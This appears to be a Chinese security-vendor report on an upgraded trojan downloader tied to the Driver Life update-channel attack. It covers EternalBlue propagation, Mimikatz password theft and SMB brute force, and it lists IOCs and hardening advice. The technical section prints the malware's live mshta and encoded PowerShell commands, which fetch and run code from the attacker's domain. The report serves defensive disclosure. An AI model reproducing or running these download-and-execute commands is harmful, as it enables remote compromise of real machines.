曾利用驱动人生升级通道传播的木马下载器攻击方法再次升级

一、概述

御见威胁情报中心1月25日再次监测到曾利用驱动人生升级通道传播的木马下载器攻击方法再升级。

本次升级主要变化在于攻击模块，木马在之前的版本上，新增计划任务“DnsScan”，在其中将永恒之蓝攻击模块C:\Windows\Temp\svchost.exe设置为木马执行当天7:05开始，之后每个一小时执行一次。

该木马团伙持续活跃，最严重的一次破坏是入侵驱动人生公司，篡改商业软件的升级配置，利用正规软件的升级通道传播病毒。在这个木马传播渠道被封堵之后，该团伙仍在利用其他传播渠道持续改进该木马下载器。

该团伙的历次活动，均被腾讯御见威胁情报中心捕获：

二、技术分析

升级后的攻击模块svchost.exe除了利用永恒之蓝漏洞对内网以及外网机器进行扫描攻击外，还新增了以下功能：

1、利用powershell版黑客工具mimikatz抓取用户机器域登录密码进行横向传播

创建m.ps1并将混淆后的mimikatz工具代码写入。

将利用工具抓取到的用户域登录密码保存到mkatz.ini。

2、攻击模块尝试通过内置的弱密码字典尝试SMB爆破远程登录

3、创建计划任务执行远程hta代码

mshta hxxp://w.beahh.com/page.html?p%COMPUTERNAME%

4、创建计划任务执行远程powershell代码

powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=

powershell命令解密后内容为：

IEX (New-Object Net.WebClient).downloadstring('http://v.beahh.com/v'+$env:USERDOMAIN)

三、安全建议

1.服务器暂时关闭不必要的端口（如135、139、445），方法可参考：
https://guanjia.qq.com/web_clinic/s8/585.html

2.服务器使用高强度密码，切勿使用弱口令，防止黑客暴力破解；

3.使用杀毒软件拦截可能的病毒攻击；

4.推荐企业用户部署腾讯御界高级威胁检测系统防御可能的黑客攻击。御界高级威胁检测系统，是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据，研发出的独特威胁情报和恶意检测模型系统。

IOCs

Domain

v.beahh.com

w.beahh.com

Md5

cce36235a525858eb55070847296c4c8

34410a21398137d71258e2658ecddaeb

4cb4ccfd1086fc78d2a1a063862bff41

65d17d790098fdff32c96bce0be6645e

7f8dde92700f5013b4ed23c6ec5b7337

8bf4cfe6d0938cd8a618e3a4cd32c79d

a56a29ddff74c1b536fa5c97863f0d35

ae4b536a5b7c6d6decc7e96591ce67f8

b73dfc81a367f4dfa44bb209ed9e5e67

c85cb83a850b4ccd2d2232a4d356d607

f6cd992c002be66c01ea2e16e3cd4df2

f75f0261296a8b7b81f54a076c58439c

fd38cca1e2fa4a7d14a2943b3ad5d20c

URL

hxxp://v.beahh.com/v

hxxp://w.beahh.com/page.html

参考链接：

永恒之蓝漏洞扩散传播的挖矿木马预警

https://mp.weixin.qq.com/s/xBx5tOl9LJmWurqgD8KYhQ

“驱动人生”升级通道传木马完整技术分析报告

https://mp.weixin.qq.com/s/XmEalNxxQ3kAySDvIVTDOw

针对驱动人生公司的定向攻击活动分析报告

https://mp.weixin.qq.com/s/ctBgivcvH216dwq00WRmOA

利用驱动人生升级通道传播的木马下载器出现新变化

https://media.weibo.cn/article?id=2309404319028930855515

驱动人生永恒之蓝下载器木马的最新变化（1.25）

https://guanjia.qq.com/news/n3/2473.html

如何关闭不必要的端口（如135、139、445）

https://guanjia.qq.com/web_clinic/s8/585.html

（来源腾讯电脑管家）